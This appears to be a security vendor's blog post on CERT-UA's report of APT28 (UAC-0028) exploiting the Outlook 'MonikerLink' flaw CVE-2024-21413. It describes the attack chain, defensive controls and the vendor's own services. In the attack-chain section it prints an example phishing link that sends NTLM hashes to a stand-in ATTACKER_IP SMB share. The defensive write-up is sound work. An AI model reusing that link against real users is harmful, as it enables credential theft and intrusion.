UAC-0028 Activity and CERT-UA Analysis: Exploit of CVE-2024-21413 (CVSS 9.8)

Estimated reading time: 5 minutes

Key Takeaways:

  • The threat actor group UAC-0028 (APT28/Fancy Bear) is actively exploiting CVE-2024-21413 to target government and military infrastructure.
  • The vulnerability, known as “MonikerLink,” allows for the unauthorized transmission of NTLM hashes by bypassing Outlook security controls.
  • Attackers utilize leaked credentials for lateral movement, NTLM relay attacks, and data exfiltration.
  • Effective defense requires a combination of urgent patching, blocking outbound SMB traffic, and integrated threat intelligence monitoring.

Table of Contents

Technical Analysis of CERT-UA Findings and CVE-2024-21413

The Computer Emergency Response Team of Ukraine (CERT-UA) recently identified a series of targeted cyberattacks attributed to the threat actor group UAC-0028, also known as APT28 or Fancy Bear. These operations focus on the exploitation of critical vulnerabilities within Microsoft Outlook, specifically CVE-2024-21413 (CVSS 9.8), to gain unauthorized access to government and military infrastructure. This technical analysis explores the tactics, techniques, and procedures (TTPs) documented by CERT-UA and provides data necessary for engineering teams to implement defensive measures.

The primary mechanism for initial access documented by CERT-UA involves the delivery of malicious emails containing links that leverage the MonikerLink vulnerability. This vulnerability exists in the way Microsoft Outlook handles specific URI schemes, particularly when an email contains a link using the file:// protocol followed by an exclamation point and a sequence of characters.

When a user clicks on a specially crafted link, Outlook fails to properly validate the “Moniker” string. This failure allows the attacker to bypass the Office Protected View and the Security Component that typically warns users about potentially unsafe links. The result is the automatic transmission of the user’s New Technology LAN Manager (NTLM) hashes to an external, attacker-controlled Server Message Block (SMB) share. In some configurations, this can lead to remote code execution (RCE) if the attacker can influence the underlying COM (Component Object Model) objects used by the application.

CERT-UA reports that UAC-0028 utilizes these leaked NTLM hashes for NTLM relay attacks or offline cracking. Once credentials are compromised, the group moves laterally within the victim’s network to extract sensitive information. This process is often facilitated by a cyber threat intelligence platform that monitors for known malicious infrastructure associated with UAC-0028, enabling faster detection of outbound SMB traffic to unauthorized IP addresses.

Attack Vector and Execution Flow

The attack chain observed by CERT-UA follows a standardized progression:

  • Phishing Delivery: The actor sends an email that appears to be a legitimate communication related to administrative or military matters.
  • URI Manipulation: The email body contains a hyperlink formatted to trigger CVE-2024-21413. For example: <a href="file:///\\ATTACKER_IP\SHARE\FILE.txt!something">Click Here</a>.
  • Bypass of Security Controls: By appending the ! character, the attacker forces the Outlook client to bypass the standard security prompts.
  • Credential Leakage: The client attempts to authenticate with the remote SMB server, sending the local user’s NTLM hash.
  • Post-Exploitation: The attacker uses the captured hash to authenticate to other services or utilizes the initial access to deploy secondary malware payloads.

Threat actor exploiting Microsoft Outlook vulnerability

Data from CERT-UA indicates that this vulnerability is frequently paired with other exploits to ensure persistence. Organizations without breach detection capabilities often overlook these initial NTLM leaks, as they may appear as standard network traffic if outbound SMB is not strictly restricted.

Role of Dark Web and Messaging Monitoring

UAC-0028 and similar state-sponsored actors do not operate in a vacuum. CERT-UA has noted that the infrastructure used in these campaigns is often discussed or traded within illicit environments. Utilizing a dark web monitoring service allows defenders to identify if internal credentials or domains are being targeted by specific exploit kits.

Furthermore, telegram threat monitoring has become essential for tracking the movement of threat actors. UAC-0028 has been observed using Telegram as a command-and-control (C2) channel or for exfiltrating small data packets to avoid detection by traditional network security tools. Monitoring these channels provides real-time ransomware intelligence and broader threat data, even if the primary goal of the UAC-0028 campaign is espionage rather than immediate financial gain.

The coordination of such attacks often involves the acquisition of compromised infrastructure via underground forum intelligence. Actors buy access to legitimate but poorly secured servers to host their malicious MonikerLinks, making the source of the attack appear more credible and bypassing simple IP-based reputation filters.

Supply-Chain and Brand Risks

CERT-UA’s investigation emphasizes that the targets are not limited to direct government employees. The threat extends to the broader ecosystem of contractors and service providers. This necessitates a focus on supply-chain risk monitoring. If a third-party vendor is compromised via CVE-2024-21413, the attacker can use the vendor’s legitimate communication channels to target the primary organization.

In addition to technical vulnerabilities, brand leak alerting is required to identify spoofed domains that UAC-0028 uses to host phishing templates. These templates often mimic official government portals to increase the likelihood of a user clicking the malicious link. By correlating live ransomware API data with identified phishing infrastructure, security teams can proactively block domains before they are used in an active campaign.

Technical Mitigation and Security Controls

To mitigate the risks associated with CVE-2024-21413 and the TTPs of UAC-0028, engineers should implement the following technical controls:

Network Level Controls

  • Block Outbound SMB: Disable outbound traffic on TCP port 445. This prevents NTLM hashes from being transmitted to external servers.
  • DNS Filtering: Implement filtering to block access to known C2 domains identified by CERT-UA.
  • Inbound Email Filtering: Configure email gateways to strip or rewrite URLs that use the file:// protocol or contain unusual characters like ! within the URI.

Endpoint and Application Controls

  • Patching: Prioritize the installation of Microsoft security updates that address CVE-2024-21413. This is the most effective way to close the vulnerability within Outlook.
  • Disable NTLM: Where possible, transition to more secure authentication protocols such as Kerberos.
  • Credential Guard: Enable Windows Defender Credential Guard to protect NTLM hashes from extraction.

Monitoring and Detection

  • Audit NTLM Usage: Enable “Audit NTLM” in Group Policy to identify reliance on this protocol.
  • Monitor Process Execution: Look for unusual child processes spawned by outlook.exe.
  • Log SMB Traffic: Analyze Event ID 5140 and Event ID 5145 for unexpected external connections.

PurpleOps Expertise in Threat Mitigation

The complexities of tracking state-sponsored actors like UAC-0028 require a multi-layered approach to security. PurpleOps provides the infrastructure and expertise needed to manage these risks effectively. Through our cyber threat intelligence platform, we aggregate data from multiple sources, including CERT-UA, to provide actionable data to our clients.

Our Cyber Threat Intelligence services are designed to identify TTPs specific to groups like APT28. By integrating real-time ransomware intelligence and live ransomware API feeds, we ensure that our defensive models are current with the latest exploit trends.

To address the risks of credential theft and unauthorized access, PurpleOps offers a Dark Web Monitoring service. This service scans for leaked credentials and mentions of organizational assets in underground forums, providing brand leak alerting before an incident escalates. For organizations concerned about their external attack surface, our Penetration Testing and Red Team Operations teams simulate the exact methods used by actors like UAC-0028.

We also assist in managing the risks posed by third-party partners through Supply Chain Information Security. This ensures that supply-chain risk monitoring is integrated into the broader security strategy. For comprehensive protection, our Protect Ransomware and broader Services provide a structured framework for defense.

Summary of Actionable Steps

For Technical Teams

  1. Verify Patch Status: Ensure all instances of Microsoft Office are patched against CVE-2024-21413.
  2. Firewall Configuration: Confirm that outbound port 445 is blocked at the perimeter.
  3. GPO Updates: Implement Restricted Groups and restrict NTLM usage.
  4. SIEM Rules: Create alerts for outbound connection attempts on SMB ports to external IP addresses.

For Business Leaders

  1. Risk Assessment: Evaluate the organization’s exposure to state-sponsored espionage.
  2. Third-Party Review: Audit the security posture of critical vendors regarding CVE-2024-21413.
  3. Investment in Intelligence: Allocate resources toward monitoring coordination on Telegram and underground forums.

For more information on how to secure your infrastructure, explore the PurpleOps Platform or contact our team for a detailed consultation.

Frequently Asked Questions

What is the “MonikerLink” vulnerability?
It is a critical bug (CVE-2024-21413) in Microsoft Outlook that allows attackers to bypass security warnings and leak NTLM hashes by misusing URI schemes in links.

Who is UAC-0028?
UAC-0028 is a state-sponsored threat actor group also known as APT28 or Fancy Bear, primarily associated with cyber-espionage operations.

How can I detect if I have been targeted by this exploit?
Organizations should monitor network logs for unauthorized outbound traffic on TCP port 445 (SMB) and audit process execution for unusual activity originating from outlook.exe.

Is patching enough to stop UAC-0028?
While patching CVE-2024-21413 is essential, defense-in-depth measures like blocking SMB, disabling NTLM, and utilizing threat intelligence are necessary to counter advanced persistent threats.